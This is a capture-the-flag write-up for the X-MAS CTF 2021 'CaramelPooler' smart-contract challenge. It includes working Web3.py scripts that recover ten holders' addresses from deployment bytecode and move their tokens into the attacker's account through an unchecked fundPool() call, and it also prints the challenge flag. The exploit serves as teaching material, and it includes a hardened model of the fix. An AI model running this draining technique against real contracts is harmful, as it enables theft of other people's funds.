Tower of Hanoi

X-MAS CTF - CaramelPooler

by on under XMASCTF2021

Challenge: CaramelPooler

Description:

Tokugawa shogunate cheated for a living. For that reason, you have to become shogun instead. Do it for Hideyoshi!
nc challs.xmas.htsp.ro 8016
http://challs.xmas.htsp.ro:8017/
Source

Analyzing the Given Files:

First we need to understand what the provided contracts do:

  • Setup.sol creates a new CaramelPool contract, passing it 10 Ethereum addresses, and also contains an isSolved() function that checks whether a variable in CaramelPool (the shogun) is different from a given address. Setup.isSolved() returning true means we have solved the challenge.
  • CaramelPool.sol mints a fixed number of tokens (total supply 180000000), divided equally between ten addresses (the ten addresses passed in by Setup.sol at creation). The contract allows those tokens to be transferred between addresses (CaramelPool.transfer(fromAddress, toAddress)), to be deposited into the pool and withdrawn again (CaramelPool.fundPool(fromAddress) and CaramelPool.withdrawFromPool()), and exposes a balance lookup (CaramelPool.balanceOf(address)). Finally, becomeCaramelShogun() checks whether the caller's balance equals the total supply and, if so, makes the caller the Shogun. Once the sender address is the Shogun, Setup.isSolved() returns true and the challenge is solved.
    Although it plays no part in the solution, CaramelPool.sol also contains a private isContract(address) function that checks whether an address is a contract. For completeness: the method it uses to decide whether an address is a contract is easily bypassed.

To obtain these contracts and the blockchain instance used for the challenge, connect with nc challs.xmas.htsp.ro 8016. After selecting launch new instance and solving a short hashcash proof of work, the server returns: an RPC endpoint, the address of the deployed Setup.sol contract, a private key and a uuid (needed to obtain the flag at the end of the challenge).

Strategy

As the analysis of the two contracts shows, all we have to do is move the tokens of the 10 addresses declared in Setup.sol to our own address with CaramelPool.fundPool() and CaramelPool.withdrawFromPool(): fundPool() takes the source address as a parameter, so anyone can deposit anyone's tokens into the pool on their own behalf.
The problem lies in finding these 10 addresses.
All data on the blockchain is public, because the chain is a publicly distributed ledger, and is therefore visible to anyone.
To recover the data a contract was deployed with, we need to find the block and the transaction that created it: the input field of that transaction holds the creation bytecode, and the hard-coded addresses appear in it as literals.
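The token-accounting flaw described above, as an added example that is not the challenge's Solidity source: a small Python model of the CaramelPool behaviour the writeup describes (fundPool moves the balance of a caller-supplied address into the pool, withdrawFromPool pays the caller, becomeCaramelShogun requires the full supply), with a hardened variant beside it. The holder names, the exact internals and the hardened check are assumptions of this example.

```python
# Added example: a model of the pool logic described in the writeup, not the
# real contract. TOTAL_SUPPLY is the figure given in the writeup; the holder
# and attacker names below are constructed stand-ins for real addresses.
TOTAL_SUPPLY = 180_000_000
HOLDERS = [f"holder{i}" for i in range(10)]


class CaramelPoolModel:
    def __init__(self, holders, hardened=False):
        # Supply split equally between the ten funded addresses
        self.balance = {h: TOTAL_SUPPLY // len(holders) for h in holders}
        self.pool = {}          # pool credit per depositor (assumed layout)
        self.shogun = None      # stands in for the unset shogun address
        self.hardened = hardened

    def fund_pool(self, sender, from_addr):
        # Vulnerable behaviour: the source of the tokens is a parameter, and
        # nothing ties it to the caller, so anyone can deposit anyone's tokens
        # and get the credit. The hardened variant insists on sender == from_addr
        # (an allowance mechanism would be the other sound option).
        if self.hardened and from_addr != sender:
            raise PermissionError("fundPool: caller may only deposit its own tokens")
        amount = self.balance.get(from_addr, 0)
        self.balance[from_addr] = 0
        self.pool[sender] = self.pool.get(sender, 0) + amount

    def withdraw_from_pool(self, sender):
        amount = self.pool.pop(sender, 0)
        self.balance[sender] = self.balance.get(sender, 0) + amount

    def become_caramel_shogun(self, sender):
        if self.balance.get(sender, 0) != TOTAL_SUPPLY:
            raise PermissionError("becomeCaramelShogun: balance != total supply")
        self.shogun = sender

    def is_solved(self):
        return self.shogun is not None


def run_exploit(hardened):
    """Replay the writeup's strategy against the model; returns (solved, attacker balance)."""
    pool = CaramelPoolModel(HOLDERS, hardened=hardened)
    attacker = "attacker"
    try:
        for holder in HOLDERS:
            pool.fund_pool(attacker, holder)     # drain every funded address
        pool.withdraw_from_pool(attacker)        # collect the whole supply
        pool.become_caramel_shogun(attacker)
    except PermissionError:
        pass                                     # the hardened pool stops us here
    return pool.is_solved(), pool.balance.get(attacker, 0)


if __name__ == "__main__":
    print("vulnerable:", run_exploit(hardened=False))
    print("hardened:  ", run_exploit(hardened=True))
```

Against the vulnerable model the attacker ends with the full supply and is_solved() becomes true; against the hardened one the first fund_pool call is rejected and nothing moves.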

Retrieving the transaction data

Fortunately, in every blockchain instance of the challenge the last block is the one in which the contracts were created. To retrieve that transaction we can write a short Python script using the Web3.py library, which allows interacting with Ethereum (and compatible) chains. Here is a quick reference on how to install and use it.
The python script must:

  1. connect with the given RPC endpoint
  2. ask the node for the last block (which only contains the transaction that deployed the challenge contracts)
  3. access the transaction present in the last block
  4. print the input of the transaction

Here’s the code:

from web3 import Web3

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))

blockNumber = provider.eth.block_number          # height of the latest block
lastBlock = provider.eth.get_block(blockNumber)
# On a fresh instance the last block holds only the deployment transaction;
# its hash is already a HexBytes value and can be passed to get_transaction as-is
txHash = lastBlock.transactions[0]
lastTransaction = provider.eth.get_transaction(txHash)
# For a contract-creation transaction the input field is the creation bytecode
print("Last transaction input: ", lastTransaction.input)

The output is the creation bytecode of Setup.sol, one long hex string; it is reproduced, split at the interesting points, in the next section.

Analyzing the Bytecode

To retrieve the 10 addresses used by the Setup.sol contract all we need to do is analyze the bytecode. The pyevmasm library helps here: its evmasm command assembles and disassembles Ethereum Virtual Machine bytecode.
The addresses holding the tokens are the immediates of PUSH instructions. Solidity drops leading zero bytes from a literal, so an address that starts with zero bytes is emitted with a shorter push than PUSH20 (0x73): in this bytecode PUSH16 (0x6f) and PUSH19 (0x72) occur, and those values must be left-padded with zeros back to 20 bytes. The same work could be done with an online disassembler, or more simply by noticing that the bytecode has a repetitive pattern that isolates the 10 desired addresses:

0x608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b50905073
 ->   0136439830e1abe0296b764691eb3fc296d145bf
816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   122e53f0444ac267371a0cf63d15cd782d8bb1c6
8160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f
 ->   219ab540356cbb839cbe05303d7705fa 	#Address to be padded with zeros
816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   4452552736041bcc3fe0f35647e56f2c4fdf956e 
8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505072
 ->   01e0515bc0b5c2df1abc2842b42b29994f44d0 	#Address to be padded with zeros
816004815181106102f3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   97eebf4908c5c08eb09196579fc6451585d1b9a6
8160058151811061037c577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   1352cb6ccec784dd765ac55f0413cadfa4946cfd
81600681518110610405577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   14db6558f0dfcd940dae566c20f694d2f0454ca8
8160078151811061048e577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   13182312eed5a75d62e45b726b63639b6a8f25bc
81600881518110610517577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073
 ->   1337cee91653179667c33affdbc28264c50c40b0
816009815181106105a0577f4e487b710000000000000000000000000000000000000000000000000000000060005260...

So the ten addresses are:

  1. 0x0136439830e1abe0296b764691eb3fc296d145bf
  2. 0x122e53f0444ac267371a0cf63d15cd782d8bb1c6
  3. 0x00000000219ab540356cbb839cbe05303d7705fa
  4. 0x4452552736041bcc3fe0f35647e56f2c4fdf956e
  5. 0x0001e0515bc0b5c2df1abc2842b42b29994f44d0
  6. 0x97eebf4908c5c08eb09196579fc6451585d1b9a6
  7. 0x1352cb6ccec784dd765ac55f0413cadfa4946cfd
  8. 0x14db6558f0dfcd940dae566c20f694d2f0454ca8
  9. 0x13182312eed5a75d62e45b726b63639b6a8f25bc
  10. 0x1337cee91653179667c33affdbc28264c50c40b0
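The extraction described above, automated, as an added example that is not the writeup's own tooling: a minimal linear-sweep EVM disassembler that walks the creation bytecode, skips PUSH immediates so bytes inside a PUSH32 (the Panic selector) or the 0xff...ff address mask are never misread, and collects the address literals, left-padding the PUSH16/PUSH19 ones to 20 bytes. The sample input is the first five segments of the bytecode shown above, concatenated; the width heuristic (PUSH16 to PUSH20) is an assumption that fits this bytecode and should be lowered if an address had more leading zero bytes.

```python
# Added example (not from the writeup): recover address literals from EVM
# creation bytecode with a linear sweep over opcodes.

ADDRESS_MASK = (1 << 160) - 1   # PUSH20 0xff..ff: the uint160 mask solc emits, not an address


def push_immediates(code: bytes):
    """Yield (offset, width, value) for every PUSHn immediate in a linear sweep.

    Immediate bytes are skipped, so values inside a PUSH32 (e.g. the Panic
    selector 0x4e487b71...) are never mistaken for opcodes or addresses.
    """
    pc = 0
    while pc < len(code):
        op = code[pc]
        pc += 1
        if 0x60 <= op <= 0x7F:            # PUSH1 (0x60) .. PUSH32 (0x7f)
            width = op - 0x5F
            imm = code[pc:pc + width]
            if len(imm) < width:          # truncated trailing PUSH: stop cleanly
                return
            yield pc - 1, width, int.from_bytes(imm, "big")
            pc += width


def extract_addresses(code: bytes, min_width: int = 16):
    """Return the 20-byte address literals pushed by the bytecode, in order.

    Solidity strips leading zero bytes from literals, so an address starting
    with 0x00.. is emitted as PUSH19, PUSH16, ... (assumed lower bound: PUSH16).
    Every hit is re-padded to 20 bytes; the all-ones mask is dropped.
    """
    found = []
    for _, width, value in push_immediates(code):
        if min_width <= width <= 20 and value != ADDRESS_MASK:
            found.append("0x" + value.to_bytes(20, "big").hex())
    return found


# Constructed sample: the first five bytecode segments from the writeup, joined.
SAMPLE = bytes.fromhex(
    "608060405234801561001057600080fd5b506000600a67ffffffffffffffff811115610054577f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6040519080825280602002602001820160405280156100825781602001602082028036833780820191505090505b50905073"
    "0136439830e1abe0296b764691eb3fc296d145bf"
    "816000815181106100d4577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073"
    "122e53f0444ac267371a0cf63d15cd782d8bb1c6"
    "8160018151811061015d577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506f"
    "219ab540356cbb839cbe05303d7705fa"
    "816002815181106101e2577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505073"
    "4452552736041bcc3fe0f35647e56f2c4fdf956e"
    "8160038151811061026b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505072"
    "01e0515bc0b5c2df1abc2842b42b29994f44d0"
)

if __name__ == "__main__":
    for i, addr in enumerate(extract_addresses(SAMPLE), 1):
        print(f"{i}. {addr}")
```

Run on the full bytecode from the previous section the same sweep yields all ten addresses; note that a plain search for the byte 0x73 would also hit the two 0xff...ff mask pushes in every segment and any 0x73 byte that happens to sit inside another immediate.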

Interacting with the contract and becoming Shōgun

After finding the ten addresses holding the tokens, we have to interact with the CaramelPool.sol contract and reach a balance equal to the total token supply. To interact with the blockchain we can use either the Web3.py Python library or the web-based Solidity IDE, Remix.
With Remix IDE we first upload the two contracts in the File Explorers tab and compile them with the correct Solidity version (here 0.8.0) in the Solidity Compiler tab.
Then, in the Deploy & Run Transactions tab, we connect to the given RPC endpoint (switch the Environment to Web3 Provider and enter the endpoint URL) and paste the Setup address into the Load contract from Address field.
Clicking At Address loads Setup.sol; calling Setup.caramelPool() (the caramelPool button in the Deployed Contracts section) returns the CaramelPool.sol address.
After loading the CaramelPool.sol contract the same way, we call CaramelPool.fundPool(fromAddress) once for each of the ten addresses; the withdrawable amount credited to us in the pool then equals the total supply. Calling CaramelPool.withdrawFromPool() followed by CaramelPool.becomeCaramelShogun() makes us the Shogun, and Setup.isSolved() now returns true.

With the Web3.py Python library, all we need is the private key of the funded account, the RPC endpoint URL, the Setup.sol contract address and the ABI of the two contracts (saved as JSON files). Note that the original script only built the last two transactions without signing and sending them, so isSolved() could never become true; the version below signs, sends and waits for every transaction and reads the real account nonce instead of assuming 0.

from web3 import Web3
import json

url = "INSERT_HERE_THE_RPC_ENDPOINT_URL_GIVEN"
provider = Web3(Web3.HTTPProvider(url))
privateKey = 'INSERT_HERE_THE_PRIVATE_KEY_GIVEN'
account = provider.eth.account.from_key(privateKey)
# Use the account's real nonce rather than assuming it has never sent anything
nonce = provider.eth.get_transaction_count(account.address)

with open("setup.json") as f:       # json file with the Setup contract ABI
    setup_json = json.load(f)
with open("caramel.json") as f:     # json file with the CaramelPool contract ABI
    caramel_json = json.load(f)

setupContract = Web3.toChecksumAddress('INSERT_HERE_THE_SETUP_CONTRACT_ADDRESS_GIVEN')
setup = provider.eth.contract(address=setupContract, abi=setup_json)
caramelContract = Web3.toChecksumAddress(setup.functions.caramelPool().call())
caramel = provider.eth.contract(address=caramelContract, abi=caramel_json)

addressesToken = [ '0x0136439830e1abe0296b764691eb3fc296d145bf', 
                    '0x122e53f0444ac267371a0cf63d15cd782d8bb1c6',
                    '0x00000000219ab540356cbb839cbe05303d7705fa',
                    '0x4452552736041bcc3fe0f35647e56f2c4fdf956e',
                    '0x0001e0515bc0b5c2df1abc2842b42b29994f44d0',
                    '0x97eebf4908c5c08eb09196579fc6451585d1b9a6',
                    '0x1352cb6ccec784dd765ac55f0413cadfa4946cfd',
                    '0x14db6558f0dfcd940dae566c20f694d2f0454ca8',
                    '0x13182312eed5a75d62e45b726b63639b6a8f25bc',
                    '0x1337cee91653179667c33affdbc28264c50c40b0']

def send(call):
    """Build, sign and send a contract call, then wait for it to be mined.
    Uses the web3.py v5 names (buildTransaction, signTransaction, rawTransaction);
    web3.py v6 renamed them to snake_case."""
    global nonce
    transaction = call.buildTransaction({
        'from': account.address,
        'gas': 70000,                       # raise this if a call runs out of gas
        'gasPrice': Web3.toWei(40, 'gwei'),
        'nonce': nonce})
    signed_txn = provider.eth.account.signTransaction(transaction, private_key=privateKey)
    tx_hash = provider.eth.sendRawTransaction(signed_txn.rawTransaction)
    receipt = provider.eth.wait_for_transaction_receipt(tx_hash)
    assert receipt.status == 1, "transaction reverted: " + tx_hash.hex()
    nonce += 1
    return receipt

for addressTarget in addressesToken:
    # Deposit each victim's tokens into the pool, credited to our account
    send(caramel.functions.fundPool(Web3.toChecksumAddress(addressTarget)))

send(caramel.functions.withdrawFromPool())     # Withdraw all the tokens to the sender address
send(caramel.functions.becomeCaramelShogun())  # Now the sender address is the caramel Shogun

print(setup.functions.isSolved().call())

Retrieving the flag

Once Setup.isSolved() returns true we can get the flag by connecting to the challenge server again with nc challs.xmas.htsp.ro 8016, selecting get flag and entering the uuid given at the beginning of the challenge.

Turns out that the flag was: X-MAS{G00d_j0b_y0u_4r3_Hideyoshis_h31r}

X-MAS CTF, Solidity, Ethereum, Blockchain, Blockchain Data Scraping, Smart Contract